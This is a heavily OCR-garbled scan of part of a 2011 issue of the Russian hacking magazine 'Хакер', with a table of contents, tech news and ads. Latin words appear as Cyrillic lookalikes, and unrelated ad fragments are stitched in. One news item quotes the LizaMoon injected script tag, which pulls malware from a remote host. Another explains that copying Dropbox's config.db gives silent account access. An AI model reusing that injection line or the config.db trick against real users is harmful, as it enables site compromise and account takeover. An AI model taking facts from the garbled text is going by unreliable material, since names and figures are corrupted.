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• ЗіІѵегІідЫ: защита и нападение 

• Внутренности ВІаскНоІе ехріоіі кі! 

• Мучаем виртуальную сеть на базе СІ5С0 

• Обламываем 11АС 

• Взлом телеков на базе Ышіх 
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БАГОВ В ѴѴЕВ-ПРИЛОЖЕНИЯХ 

СТР. 56 






Журнал Хакер ищет кандидатов 
на должность редактора 
рубрики Взлом 



га 



! _ѵ,і ! 1 - : 





Основные приметы: 

На вид 18-25 лет 

Читает журнал Хаиер и мечтает в нем поработать 
Знает слова «Х55» и «Неар оѵегііоілг» 

Умеет и любит лечить БОЬ-инъеиции от слепоты 

'Л, А 

В курсе, чем пиІІ-ЬуІе отличается от дідаЬуІе . , 

Предпочтет поездку на Віаск На! алкотуру в Ебипте 
С первого раза отличает хорошую статью от плохой 
Способен связать больше 5 слов в читаемое предложение 
Готов к жестиой работе по вербовие новых авторов 
Умеет читать технические теисты на английском 





Обращаться на адрес пікі!ог@геа1.хакер.гц 
со стропой «Ѵ2ІаОМ» в теме письма » . 
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С ЭТОГО МЕСЯЦА У НАС ПРОИЗОШЛО 
ЗНАЧИТЕЛЬНОЕ ИЗМЕНЕНИЕ В КОМАНДЕ. 

Дима «РогЬ» Докучаев завершил свою работу в роли 
редактора рубрики «Взлом». Дима — серьезная веха 
для журнала. Он воспитал на своих статьях целое 
поколение — сначала как автор, а потом и как редак- 
тор рубрики. 

Считал тут из интереса, вдумайся: Дима начал работу 
в журнале 10 лет назад, в 2001 году. За это время он 
написал в журнал 147 статей общим объемом около 
2 млн. символов. Это, на всякий случай, больше двух 
первых томов «Войны и мира». 



За время редакторской работы Дима организовал и 
отредактировал больше 400 статей общим объемом 
почти 7 млн. символов — тут уж Лев Николаевич с 
«Войной» отдыхает два раза. 

Но все в мире развивается и когда-либо заканчива- 
ется. Закончилась и Димина пора в «Хакере», Диму 
ждут большие задачи. 

Большой респект большому человеку :). 

пікііо22, гл. ред. X 

ЬЛрУ/ѵкопІакІе.ги/хакер тад 




Сопіепі 



МедаЫеѵѵз 

004 Все новое за последний месяц 

Реггит , 

016 Ноутбук для работы 

Выбираем ноутс диагональю до 14" 

021 Золотая жила 

Тестирование блока питания Р5Р АІІРІІМ СОЮ 700 (АС-700) 

РС_2опе . 

022 Сигнатурныедела 

Анализатор файлов и антивирус — своими руками 

026 Рагаііеіз Оезкіор: 

правильная виртуализация под Мае 

10 советов по использованию виртуальной машины 

030 Колонка редактора 

Про НТТР-туннелирование 

032 Визуальные скрипты 

Вікиіі: простая автоматизация через скриншоты и РуШоп 

036 МІХ2011 

5 самыхзначимых итогов девелоперской 
конференции МісгозоД 

Взлом. 

038 Еазу-Наск 

Хакерские секреты простых вещей 

042 Обзор эксплоитов 

Анализ свеженькихуязвимостей 

048 0ЫБ: обратная связь. Часть вторая 

Продвинутый рауіоасі для организации туннеля 

052 Игры с домашней киской 

Мучаем дома виртуальную сеть на базе Сізсо и не только 

056 РНР-дайвинг 

Низкоуровневый поискуязвимостей в веб-приложениях 

062 Безопасность плагинов 
боодіе Сбготе 

Привычные векторы атак в контексте аддонов для браузера 

066 Х-Тооіб 

Программы для взлома 

МАІ.ѴѴАКЕ . 

068 Вскрываем эксплойт-пак 

Разбираем внутренности ВІаскНоІе ехріоіі: кіі: 

072 Шалости сантивирусами: 
ЬедіппегзесІШоп 

Испытываем базовую устой ч и вость АѴ6, 

Тгепб Місго и М іегогобі: Зесигііу Еззепбаіз 

075 Тренды киберпреступлений 

Немного графики о субегсгіте 



Сцена. 

076 Имя нам — легион 

Анонимус не прощает 

Юниксойд • 

082 Грани виртуальных миров 

Разбираемся сновымии необычными технологиями 
виртуализации 

088 Тараканьи бега 

Обзор самых интересных багов в *піх’ах 

092 Плюшки для десктопа 

Делаем рабочий стол проще и удобнее 

Кодинг. 

098 Обламываем ІІАС 

Такли страшна программисту система контроля 
пол ьзователей? 

102 ВіІѵегІідЫ: — защита и нападение 

Проблемы безопасности ВіІѵегІідЫ-контролов 

106 Рецепты НТМБ5 

Погружаемся в кодинг под НТМІ_5 на конкретных примерах 

110 Программерскиетипсы итриксы 

Делаем код более четким, легким и красивым 
с хакерской точки зрения 

5ѴЫ/АСК . 

114 Система предотвращения 
вторжений вТМѲ2010 

Разбираем ТМО, N15, ОАРА и другие сокращения 

120 Параллельный мир 

Сравниваем возможности виртуальных машин 

124 Мобильный контроль 

Делаем «лично-корпоративные» ноуты и смартфоны 
пользователей безопасными 

РНКЕАКШС . 

128 НАСКТѴ 

Взлом телевизора и изучение его кишок на примере 
Заппзипд І_Е650В 

Юниты 

134 Р5УСН0: Калейдоскоп иллюзий 

Зачастую все не так, как кажется... 

или ностальгия по статьям Криса Касперски 

140 РАСНІМТЕО 

Большой РАО 

143 Диско 

8.5 Гб всякой всячины 

144 ѴѴѴѴѴѴ2 



Удобные ѵѵеЬ-сервисы 





Тараканьи бега 

Обзор самых интересных багов в 
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МЕ6АЫЕШ5 



Мария «МИтіИ» Нефедова (тіТгіШЭгеаІ. хакер. ги ) 




Медапеѵѵз 

НАЙДЕНА ДЫРКА В 0К0РВ0Х 




Неприятная новость распростра- 
нилась по интернету со скоро- 
стью лесного пожара: в ОгорЬох, 
популярнейшем решении для 
синхронизации файлов между 
разными компьютерами и мобиль- 
ными устройствами, обнаружили 
уязвимость. Найденная дыра.увы, 
не пустяшная: все дело в файле 
сопбд.сІЬ, хранящемся по адресу 
%АРР0АТА%\0горЬох и являюще- 
му собойтаблицу базы данных. В 
таблице всего лишьтри поля — етаіі, сІгорбох_раІЬ и Ьо5І_ісІ. Последнее 
поле не относится копределенному хосту, назначается системе после 
первой авторизации и не меняется со временем. И вотв чем прикол. Для 
авторизации ОгорЬох использует именно это самое значение ЬозНсІ, 
а файл сопбд.сІЬ портативен и не связан с системой. Получается, что 
копирование сопбд.сІЬ на другую машину и запуск ОгорЬох немедленно 
синхронизирует эту систему с аккаунтом, без уведомления пользователя 



РгорЬох 



и без внесения новой системы в списокдоверенных! Хуже того, пользо- 
ватель даже ничего не заметит, а если он сменитлогин и пароль, тоже 
ничего не изменится, — Ьо5І_ісІ все равно останется валидным. Ждем 
малварь, нацеленный на сопЯд.сІЬ и ЬозНсІ? Кстати, никаких методов 
защиты кроме зубодробительного шифрования данных или отказа от 
использования ОгорЬох’а пока нет. Все подробности в блогеухакера 
Дерека Ньютона, который и нашел уязвимость: ЬіЫѵ/сІгорЬох іаіі . 




Іпіозесигііу Еигоре провела опрос среди людей на улицах Лондона, 
спрашивая у них, что такое облачная обработка данных. Оказалось, что с 
ІТ-грамотностью у народа очень плохо. 25% ответили, что это «такой датацентр 
в небе», 20% сказали, что это «какая-то реклама МісгозоН», а еще 10% думают, 
что это «модный клуб в Сохо» :). 

МАССОВЫЙ ПЕРЕХОД НА МВЕР ОТМЕНЯЕТСЯ 

Какты знаешь из наших предыдущих публикаций, популярный на просторах нашей родины мессенджер 
ІСО, атакже протокол ісд с недавних пор являются собственностью инвестиционного фонда Маіі.ги Огоир. 
Признаться, мы неждали отпродажи аськи ничего хорошего, и понимали, что существует реальная опас- 
ность объявления войны альтернативным клиентам. И войны куда более серьезной, чем в свое время вел 
АОІ_. Иногда ошибаться приятно :). Стало известно, что теперь протокол ісд можетспокойно использоваться в 
некоммерческих альтернативных клиентах, ограничения сняты, а альтернативы — полностью легализованы. 
Новую, более мягкую версию лицензионного соглашения уже опубликовали официально, найти ее можно 
на ісд.сот . Из старых ограничений для разработчиков некоммерческих приложений сохранились разве что 
пункты, связанные с недопустимостью таких злоупотреблений какизвлечение информации из каталогов и 
баз данных ІСО, массовая рассылка нежелательных сообщений и введение пользователей в заблуждение. 
Плава ІСО в России, Александр Горный, особенно подчеркивает: «Легализация всех существующих на сегод- 
няшний день неофициальных ІСО-клиентов — одна из важнейшихзадач для МаіІ.Пи Сгоир натекущем этапе 
развития продукта. Анонсируя новое лицензионное соглашение, мы хотим еще раз официально подтвердить 
готовность к переговорам и поиску приемлемых вариантов сотрудничества с другими игроками рынка. Ведь 
наша общая цель — создание безопасных и удобных условий общения для пользователей». Кстати, моне- 
тизируемые клиенты тоже не были забыты или запрещены, с их разработчиками в Маіі.ги готовы обсудить 
условия партнерства и договориться. 
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А51І5 рекомендует ѴѴіпсІоѵѵз® 7. 



Іпзрігіпд Іппоѵаііоп • Регзізіепі РегТесІіоп 

Ноутбуки А5ІІ5 серии N 

на базе процессоров Іпіеі® Соге™ І5 второго поколения 

ПОЧУВСТВУЙ МОЩЬ ЖИВОГО ЗВУКА 




Благодаря эксклюзивной технологии ЗопісМазіег, разработанной в сотрудни- 
честве со специалистами фирмы Вапд & ОІиТзеп, ноутбук АЗІІЗ І\І533ѵ 
с подлинной операционной системой ѴѴіпсІоѵѵз® 7 Домашняя расширенная 
обеспечивает четкий, насыщенный, глубокий звук, который нельзя было 
услышать раньше ни на каком ином мобильном компьютере. Помимо 
выдающейся аудиосистемы в этом ноутбуке реализована технология Зирег 
НуЬгісІ Епдіпе, которая увеличивает производительность на 7 процентов*, 
современный интерфейс 115В 3.0 и функция Ѵісіео Мадіс, улучшающая качество 
стандартных видеоматериалов до уровня РиІІ-НЮ 1080р. Второе поколение 
процессоров Іпіеі® Соге™ І5 обеспечивает умную производительность 
с ускорением, которая позволяет добиться невероятной оперативности работы 
ПК. Ноутбуки АЗІІЗ серии N с аудиосистемой ЗопісМазіег подарят вам 
совершенно новые ощущения! 

* Зависит от конфигурации. 




ѵѵѵѵѵѵ.азиз.ги 

ѵѵѵѵѵѵ.азизпЬ.ги 

Всемирная гарантия 2 года 

Горячая линия АЗЫЗ: (495) 23-11-999, 8-800-100-2787 

Информацию о том, где купить ноутбуки АЗІІЗ, можно найти на сайте ѵѵѵѵѵѵ.азизпЬ.ги 

Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации Іпіеі на территории США и других стран. 

Товар сертифицирован, на правах рекламы. 




Умный. 

И это видно. 
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«ЯБЛОННЫЕ» ДИСПЛЕИ 



С ОБРАТНОЙ СВЯЗЬЮ 

/ 200 




Еще одним патентом пополнились и без того 
почти бездонные закрома компании Арріе. Стало 
известно, что яблочный гига нт за патентовал сен- 
сорные дисплеи собратной связью. Разумеется, 
никаких гарантий, что уже в скором будущем 
мы увидим реализацию этих идей в готовых 
продуктах, нет. Но согласись, если отбросить 
визуальную сторону дела, при работе стачскри- 
ном (при всем его удобстве] действительно не 



хватает физического отклика отустройства. Ба- 
нальный набордаже небольшого текста крайне 
утомителен. Арріе подали патент на механизм 
тактильной обратной связи еще в 2009 году, и 
теперь наконец-то завершили все процедуры ре- 
гистрации. Изюминка технологии заключается в 
использовании массива стержней, которые под- 
нимаются над поверхностью сенсорного экрана. 
Эти стержни создают иллюзию рельефной 



картинки под пальцами, и складывается впечат- 
ление, что ты нажимаешь на настоящие кнопки. 
Что-то вроде дисплея Брайля для неслепых. Дру- 
гая технология, которая также описана в патенте, 
не менее интересна: подэкраном располагается 
структура, создающая впадины. При нажатии в 
центр такой впадины, она легко поддается, но 
при нажатии на периферийную часть — ощутимо 
сопротивляется. 



» Марк Шаттлворт сообщил, что уже в осеннем релизе Шишіи (11.10) 

пользователи не найдут привычной оболочки бИОМЕ. Теперь ее придется 
отдельно скачивать из репозитория и доустанавливать самостоятельно. 



СКРИПТ Ы2АМ01Ж ПОВСЮДУ 



Ты уже наверняка слышал отголоски шумихи, которая совсем недавно 
поднялась по всему инету из-за скрипта ЫгаМооп. Масштабы поражения 
действительно впечатляют. Массовая ЭОБ-инъекция на веб-приложения, 
которые работаютна платформе 1 15 + М5 ЗОБ Зегѵег, привела кзаражению 
сотни тысяч сайтов по всему миру. Такие крупные прецеденты случаются, 
прямо скажем, не часто. Инфекция затронула в основном США, Кана- 
ду, Италию, Бразилию и Великобританию. Казалось бы, информация о 
ЫгаМооп широко распространилась в Сети и прессе, а значит, эпидемия 
должна пойти на спад. Но ничего подобного. На данный момент поиск в 
Соодіе выдает более чем 1 500 000 результатов, связанных с ІІПІ_, с кото- 
рого началась атака! Впрочем, эксперты уверяют, что данные поисковой 
выдачи — не самый надежный метод сбора статистики, и возможно, мас- 
штабы эпидемии не до такой степени велики. Механизм работы малваря 
довольно прост: внедряемый файл меняеттекстовые поля в базеданных, 
добавляя в нихдополнительный фрагмент <5СгірІ5гс=Ьххр://ІІ2атооп. 
сот/иг.рЬр></5сгірІ>, который загружает вредоносную программу с 
удаленного сервера. Затем пользователя перенаправляют на сайт, откуда 
ему загружается фальшивый а вер ѴѴіпсІоѵѵз Зіабііііу Сепіег. На машине 
юзера, как по мановению волшебной палочки оказывается целый букет 
вирусов, итутже предлагается «спасение» — загрузка антивирусного ПО. 
Разумеется, Місгозоіі никакого отношения к этому сайту не имеет, анти- 



вирь поддельный, и, в качестве «вишенки на торте», за полную версию 
этого фейка пользователю предлагается заплатить. 



В 




ѴѴАгёі\ШѴІС! 
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ШШШМЕ 903 

Много лет назад мы все заморачивались покупкой комьютера по частям и самостоятельно 
собирали его, посмеиваясь над производителями готовых сборок (и непременно теми, 
кто их покупает). Мол, и железо они подбирают не оптимальное, и продают втридорога. 
Романтика ЬапсІусгаТі'а давно ушла, пришел простой расчет. Оказалось, что готовые сборки с 
установленной системой зачастую обходятся дешевле, чем собирать компьютер самому. Легче 
пойти в магазин и купить компьютер с классной конфигурацией за хорошую цену. В случае 
с ѴѴЕХІ.ЕР.НОМЕ 903 с 64-битной ѴѴіпсІоѵѵз® 7 на борту ты получаешь практически топовую 
машину, которая идеально подойдет для игр. 




В качестве процессора используется мощный двухядерный процес- 
сор Іпіеі® Соге™ І5-650 с частотой 3,2 ГГц и кэш-памятью 4 Мб. СРІІ 
имеет встроенный контроллер памяти и поддерживает технологию 
ТигЬо Воозі, автоматически разгоняющую его под нагрузкой (напри- 
мер, в последних играх). Более того, такие процессоры поставляют- 
ся еще и со встроенным контроллером памяти. 

Видео 

За игровые возможности отвечают две видеокарты ОеРогсе 6ТХ 460, 
основанные на новейшей вычислительной архитектуре «Регті». 
Благодаря высокой производительности в режиме БігесіХ 11 тес- 
селяции процессор 6ТХ 460 обеспечивает идеально четкую гра- 
фику без ущерба для скорости, а поддержка технологий ІМѴЮІА ЗБ 
Ѵізіоп™, РЬузХ® и США™ позволяет визуализировать все самые 
потрясающие эффекты, на которые способны компьютерные игры. 
Просто выставляй настройки графики на максимум. 

ОЗУ 

Компьютер ѴѴЕХІ_ЕР.НОМЕ 903 укомплектован оперативной памятью 
4 Гб, работающей в двухканальном режиме. Благодаря этому работа 



с каждым из двух установленных модулей памяти осуществляется 
параллельно. Пускай технология и не дает теоретического увеличе- 
ния пропускной способности в два раза, но, тем не менее, вносит 
ощутимый результат. 

Блок питания 

Набор мощного железа не может обойтись без надежного пита- 
ния. В ѴѴЕХІ_ЕР.НОМЕ электропитание осуществляется с помощью 
надежного блока питания мощностью 750 Вт. Это даже больше, чем 
нужно, но зато обеспечивает хороший запас надежности. 

Софт 

На всех компьютерах ѴѴЕХБЕР.НОМЕ 903 предустановлена операци- 
онная система ѴѴіпсІоѵѵз® 7 Домашняя расширенная. Использование 
именно 64-битной версии не случайно: благодаря этому удается 
задействовать все 4 Гб установленной в компьютере памяти. Помимо 
ОС, дополнительно установлен бесплатный антивирус Місгозо^® 
Эесигііу Еззепбаіз и ОГГісе 2010 Эіагіег (включает в себя ограничен- 
ный функционал ѴѴогб® и Ехсеі®, для активации полнофункциональ- 
ной версии необходимо приобрести ключ продукта). 



Місгозоіі 




Домашняя расширенная 



Мы рекомендуем подлинную ОС ѴѴіпсІоѵѵз® 7. 



шсхшг 

♦ 



ЗАО «БТК» — официальный дистрибутор 
техники ѴѴЕХІ.ЕР в России 
Единая служба поддержки ѴѴехІег: 

+7 ( 800 ) 200-9660 

ѵѵѵѵѵѵ.ѵѵехіег.ги 



© Владельцем товарного знака Місгозо!!® и логотипа ѴѴіпсІоѵѵз® 7, зарегистрированных на территории США и/или других стран, и владельцем авторских прав 
на его дизайн является корпорация МісгозоЙ®. 



РЕКЛАМА 




МЕ6АЫЕШ5 



ПОИСК ПО ФОТОГРАФИИ. БЫСТРО. НЕДОРОГО. 



Еще совсем недавно это было шуткой и темой для забавных комиксов. Параноики 
мрачно юморили, что скоро-скоро поисковики научатся искать людей в Сети по 
фотографиям, и воттогда-то, наконец, и наступит полный абзац. Кажется, до- 
шутились. По Сети гуляет слух, что в Соодіе вовсю кипит работа над приложением, 
которое будетискать в интернете личные данные людей, отталкиваясь отобычных 
фотоснимков. Пока, судя по всему, предполагается поиск по Соодіе’з Ргоіііез и 
социальным сетям, и только с предварительного согласия владельцев аккаунтов. 
Шпионское приложение будет искать имя, телефонный номер и адрес электрон- 
ной почты. О поиске какой-либо другой информации пока ничего не сообщается. 
Самое жуткое заключается в том, что у Соодіе есть все необходимое для реализа- 
ции этой идеи — и технические возможности, и софтверные. Этому нетрудно по- 
верить, если вспомнить, что поисковый гигант проводитэксперименты в области 
распознавания изображений с 2009 года, имеетнемалотематических патентов и 
уже даже приобрел компанию Ыке. сот, занимавшуюся исследованиями в этой 
области. Даже если данный слух окажется выдумкой, и Соодіе не вынашивает по- 
добных планов, где гарантия, что нечто подобное не реализует кто-нибудь другой? 
Какое же чудное и веселое будущее нас ожидает, дорогой читатель. 




ПЛЮС один 

Социальные закладки уже стали неотъемлемой частью Сети. Кнопки 
«поделиться» есть почти на каждом уважающем себя сайте, так что 
переправить информацию в Тѵѵіііег, РасеЬоок, блоги так дал ее — про- 
ще простого. Похоже, у столь популярной кнопки «Ыке іі» появился 
тяжеловесный конкурент: компания Соодіе запустила втестовом 
режиме кнопку +1 . Новый элемент III будет наличествовать рядом с 
каждым результатом поиска, и ее можно будет нажать, если сайттебе 



понравился. Эти действия, вполне предсказуемо, будут влиять на 
релевантность информации для тебя и твоих контактов. То есть, если 
человек из твоего списка Соодіе Сопіасіз или Ста іі нажал +1 на какой- 
то странице, то данный сайт для тебя будет выше других в результатах 
поиска (при прочих равныхусловиях]. Кстати, кнопки +1 нетолько будут 
отображаться рядом с результатами поиска, но также появятся и просто 
на страницах сайтов. 




Компания Вгапсіе Нпапсе назвала Соодіе самым дорогим брендом 
планеты. Его стоимость составляет $44 300 000 000 долларов. 



СТАРЫЙ ДОБРЫЙ КОМПЬЮТЕР В КЛАВИАТУРЕ 




Думаю, многие наши читатели застали и хорошо помняткомпа- 
нию Соттобоге, выпускавшую в 80-е годы культовые компьютеры 
Соттобоге и Атіда. Однако немногиезнают, что Соттобоге ІІ5А 
сейчас пытается вернуть те славные дни и создать современный ком- 



пьютер в клавиатуре. Недавно Соттобоге представила уже закончен- 
ную и готовую к продаже модель Соттобоге ѴІС-51іт, которая разве 
что немного толще и тяжелее обыкновенной «клавы». Глядя на девайс 
с габаритами 460 х 168 х 16, 1 -30.1 мм, сложно заподозрить, что внутри 
скрывается двухъядерный процессор Іпіеі Аіот 0525 (1 ,8 ГГц] и набор 
системной логики Іпіеі ЫМ 10. «Клавиатура» также оснащена 1 или 2 
Гб памяти ООНЗ-Юбб, жестким диском на 250 или 500 Гб, адаптерами 
Еібегпеі 1 00 Мбит/с, 802.1 1 Ь/д/п ѴѴі-Еі и Віиеіооіб, а также звуковым 
кодеком Веаііек НЭ Аибіо. Имеются у Соттобоге ѴІС-51І т и пятьпортов 
115В 2.0, один портСОМ, выход ѴСА, вход и выход звуковой подсистемы. 
С ценами на данный девайс все непросто. За $295 ты можешь приобре- 
сти систему без памяти, дискового накопителя и средств беспроводного 
подключения. Эдакий набор «сделай сам». Добавление 1 Гб памяти, 
винчестера объемом 250 Гб, ѴѴі-Еі и ВІиеІооіЬувеличитценудо$395. 
Максимальнаяже конфигурация с ѴѴі-Еі и Віиеіооіб, 2 Гб памяти и вин- 
честером объемом 500 Гб обойдется тебе в $495. Практически идеаль- 
ный подароклюбителю олдскула :). 
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ПРИ ПОКУПКЕ 
КАЧЕСТВА - 

МОЛОКО *1 
В ПОДАРОК 



мт 

'ЛОКО 



{ 

41 






, , Слове» «кашрут* йа иврите озі тачает *гіриюдный. разрешенный". 

Система кошерного питания - эго древнейшая, бережно сохраняемая- . 
градицм я ен|>ййскоі о народа. В ее основе лежат несколько заповедей 
'■ ■ из Торы. 8 юм число, относящиеся к здоровью животных. ■ і- 

\ Ученые изучал» і и п рі і меняли Зэ»-ч ;ш ы каі і трута на протяжен ни трех тысяч лет 
І^Люди различных па циотльностей и вероисп оседании доверяют 
;| качеству кошерных продуктов. Во многих странах мира, кошерные ■ 
продукты питания считаются Сюлее качественными - из -за строгого 
;; контроля и дополнительных требований по гигиене, пищевым добавкам; : - 

и т Трим енен и кт химі нее ких нео шс г в. ■ ■ • ••••.. ^ ^ 

Идеологи ческую основу кошерного питания прекрасно передает^. 
поговорка "мы - -по то, что мы едим". От еды напрямую зэяисиг # \ ѵ ' 




МЕ6АЫЕШ5 



ШТЕШ НЕ СДАЕТСЯ 



С выходом Моѵедля Ріау ЭіаЕоп и Кіпесідля 
ХЬох 360 остальные производители консолей 
ощутили, что безоблачные деньки прошли. 
Особенно сильно это, конечно, ударило по 
N іпТепсІо ѴѴіі. Если раньше манипуляторы ѴѴіі 
были уникальны, и N іпТепсІо, без преувеличе- 
ния, совершила революцию, то с появлением 
подобныхдевайсову соперн и ков золотая пора 
для ѴѴіі явно осталась позади. Хорошо иллю- 
стрируют ситуацию цифры: по сравнению с 2009 
годом прибыль компании в 2010-201 1 годуупала 
на 66% ! Руководство N іпТепсІо, однако, пред- 
виделотакое развитие событий, и довольно 



скоро (вероятнее всего, в 201 2 году] мы наконец 
увидим новую версию консоли ѴѴіі. Слухи о 
появлении ѴѴіі 2 ходятуже более 2-х лет и, судя 
по всему, они были правдивы. Ожидается, что 
официально приставку продемонстрируют 
миру на конференции ЕЗ, которая состоится в 
июне. Ноуже сейчас в Интернете появилась 
информация, что новая консоль получит воз- 
можность воспроизводить ЕиИЕЮ (1080р, вто 
время каку конкурентов в играх 720р); вероятно, 
обзаведется приводом Віи-Рау; и поговари- 
вают даже о появлении Зй. В довесок по Сети 
курсируетупорный слух, что ѴѴіі 2 якобы получит 




имя Эіхеат, что можетуказывать на возмож- 
ность потоковой передачи игрового контента 
на встроенный дисплей, который будет частью 
контроллеров новой приставки. Да-да, нам обе- 
щают полностью новый контроллер и встроен- 
ный сенсорный дисплей. Осталось дождаться 
ЕЗ и узнать подробности. 




По итогам Всемирного Экономического Форума Россия заняла 77 место из 
138 в списке развития стран в области ІТ. 



ДВУХЪЯДЕРНАЯ «СЕНСАЦИЯ» ОТ НТС 



Смартфоны тайваньской компании НТС за- 
служенно пользуются большой популярностью 
во всем мире, и наша страна не является 
исключением. Очередная новинка от НТС, 
представленная в Лондоне 12 апреля, уже ста- 
ла объектом вожделения многих поклонников 
бренда :]. Двухъядерный смартфон, работаю- 
щий под управлением АпбгоісІ 2.3 СіпдегЬгеасІ и 
НТС Эепзе 3.0, проектировался как настоящий 
флагман и получил имя Зепзабоп («сенсация» 
— англ.]. Производитель нескромно называ- 
ет новинку мультимедийным суперфоном. В 
списках компонентов Эепзабоп действительно 
впечатляющие позиции: двухядерный про- 
цессор Оиаісотт Эсогріоп частотой 1 .2 ГГц 



+ СРІЭ Абгепо 220 и оперативная память 768 
Мб. СЕСИ-дисплей диагональю 4.3" обладает 
разрешением 960x540 пикселей и надежно 
защищен закаленным стеклом Согіііа Сіазз. 
Кстати, прочен нетолько дисплей: весь корпус 
аппарата выполнен из единого куска алю- 
миния, как было в НТС Моіагі и НТС Оезіге 5. 
Гармонично дополняют картину две камеры: 
фронтальная ѴСА и 8-мегапиксельная с І_ЕО- 
вспышкой, способная снимать видео в раз- 
решении 1080р. Емкость батареи смартфона — 

1 520 мАч. МісгоЕІЭВ-портЭепзабоп совмещен с 
разъемом МНЕ. Разработчики также отмечают, 
что ощутимо ускорен запуск приложений и 
значительно доработан интерфейс НТС Эепзе 




3.0, достойный отдельной небольшой статьи. 
В России смартфон поступит в продажу где-то 
виюне. О цененовинки пока ничего не со- 
общается, но мы полагаем, что она составит 
примерно 25-28 000 рублей. 



МИХАЛКОВ ОТСТОЯЛ СВОЕ ПРАВО НА «ОБРОК» 
С БОЛВАНОК 



Мы уже неодно- 
кратно писали о так 
называемом «на- 
логе на болванки», 
который в России 
ввели относительно 
недавно. Напомним, 
что Российскому Союзу Правообладателей, 
который возглавляет Никита Михалков, яв- 
ляющийся главным лоббистом данного на- 
лога, разрешили собирать отчисления в раз- 
мере 1 % со всех носителей аудиовизуальной 
информации. Казалось бы, 1 % , чего здесь 
страшного? Однако посмотри на список 
девайсов, которые обложили налогом: ЭВМ 
общего назначения, ЭВМ клавишные, ЭВМ 
прочие, устройства запоминающие внутрен- 



ние, устройства за поминающие внешние, 
аппаратура звукозаписывающая, аппарату- 
ра телевизионная, аппаратура видеозаписи 
и воспроизведения бытовая, телефоны, 
широковещательные радиоприемники. Под 
эти определения, какты понимаешь, по- 
падают и ОѴО, и флешки, и жесткие диски, и 
мобильные телефоны (кстати, какие именно 
«телефоны», там не сказано — может, и дис- 
ковые тоже?], и компьютеры всех мастей. В 
общем, масштаб уже ощущается, не так ли? 
Общая сумма сбора по некоторым прогно- 
зам может превысить 100-150 миллионов 
долларов в год. Однако в январе текущего 
года у РСП попытались в судебном порядке 
отобрать аккредитацию на сбор «налога на 
болванки»: протест выдвинул единственный 



конкурент Михалкова — Российское обще- 
ство по смежным правам, утверждавшее, что 
конкурс по вы бору сборщика пошлин был 
проведен незаконно. Зимой Арбитражный 
суд Москвы принял решение, гласившее, 
что претензии РСП на сбор 1 % со стоимо- 
сти звукозаписывающей техники и чистых 
носителей являются неправомерными. 

Рунет (где, как известно, Никиту Сергеевича 
не особенно любят] вздохнул с облегчением, 
но, как оказалось, рано. В середине апреля 
по просьбе Росохранкультуры и самого РСП 
решение Арбитражного суда было отменено, 
а аккредитация Российского Союза Право- 
обладателей на сбор «оброка с болванок» 
подтверждена. Осталось еще обложить на- 
логом интернет, и, чего мелочиться, воздух. 




► 010 
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Наш РС никогда не висит! 




Карта мужского рода 

■ Специальные мероприятия 

■ Скидки на компьютерные товары 
и не только... 

ѵѵѵѵѵшапсаічі.ги 



МАХІМ 

МУЖСКОЙ ЖУРНАЛ С ИМЕНЕМ 



А 



Альфа* Банк 



(дате)іаті 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно для регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 




МЕ6АЫЕШ5 



ЗОНУ И ХОТЦ ПОМИРИЛИСЬ 




Парадоксально, но факт — компания 5опу и 
Джордж «6еоНоІ»Хотц, сумели урегулировать 
свои разногласия мирным путем. Напомним, 
что компания подала на беоНоНа в суд из-за 



джейлбрейка консоли Р53 и обнародования 
сопутствующих материалов в Сети. Хотц, 
в свою очередь, объявил 5опу настоящую 
войну, призывая бойкотировать продукцию 
компании, выступая на ТВ и широко осве- 
щая конфликт в своем блоге: деобоідоізиесі. 
Ыодзроі.сот . Теперьже выясняется, что 
мирное соглашение между корпорацией и 
ОеоНоІ’ом было подписано еще 31 марта. 
Хотц согласился больше не ломатьустрой- 
ства 5опу, не помогать в этой области другим 
хакерам, а также не распространять конфи- 
денциальную информацию о компании. Если 
он на рушит условия соглашения, его ждет 
штраф в размере от$1 0 000 до $250 000. Тем 



не менее, со страниц своего сайта Хотц по- 
прежнему призывает общественность бой- 
котировать 5опу и не покупать их продукцию, 
а также обещает, что это еще не конец. Хакер 
пожертвовал $10 000, оставшиеся от сбора 
средств на суд с 5опу, в пользу Еіесігопіс 
Егопііег ЕоипбаОоп. Он пишет, что делает это 
«в надежде на то, что Америка сможет в один 
прекрасный день снова стать ярким образцом 
свободы без ОМСА и АСТА, что частный инте- 
рес никогда не превзойдет идеи неприкос- 
новенности частной жизни, собственности и 
свободы слова, изложенные в Конституции». 
Одним словом, умения эпатировать публику 
Джорджу не занимать :). 




Пока все праздновали День Космонавтики, Рунет тихо и почти незаметно 
отметил «день рождения». 7-го апреля 2011 года исполнилось ровно 17 
лет с момента регистрации первого домена .ш. 



ЗАКОН ОБ ЭЛЕКТРОННОЙ ПОДПИСИ 



Свершилось! 8 апреля 201 1 года вступил в силу 
новый Федеральный закон Ы63-ФЗ «Об электронной 
подписи». Цифровая подпись предназначается для 
использования в электронных документах, в част- 
ности, при обращении в государственные службы и 
ведомства. Старая версия закона (1 -ФЗ] имела много 
недочетов, к примеру, она фактически не допускала 
использования ЭЦП для юридическихлиц— под- 
пись всегда была только для лицфизических. Новый 
закон учел этот нюанс, а также множество других. 
Отныне законодательство допускает использова- 
ние однойтолько технологии электронной подписи 
(основанной натехнологии асимметричных ключей] 
и делает необходимой иерархическую систему 
удостоверяющих центров. Изменили также и само 
определение электронной подписи, теперь в нем 
закреплен основной признак, присущий всем видам 

АРРІ.Е ЗТОКЕ ИДЕТ В РОССИЮ 




таких подписей, — возможность ее использования 
для идентификации физлица или юрлица, подписав- 
шего информацию в электронно-цифровой форме. 
Предусмотрены механизмы признания иностранных 
электронных подписей. Подписитеперь могутбыть 
трех видов: простая электронная подпись, усиленная 
неквалифицированная иусиленная квалифици- 
рованная. Предусмотрена также и ответственность 
для удостоверяющих центров и тех, кто использует 
усиленную или квалифицированную электронную 
подпись, а также за причиненный вред в результате 
нарушения правил их использования. Скорее всего, 
электронная подпись будет платной, причем ее стои- 
мость будет зависеть от цены цифрового носителя. С 
полным текстом закона ты можешь ознакомиться на 
сайте «Российской газеты»: га.ги/201 1/04/08/росІрІ5- 
сІок.ЫтІ . 



Когда поклонники яблочной компании уже 
почти отчаялись, чудо, похоже, все же решило 
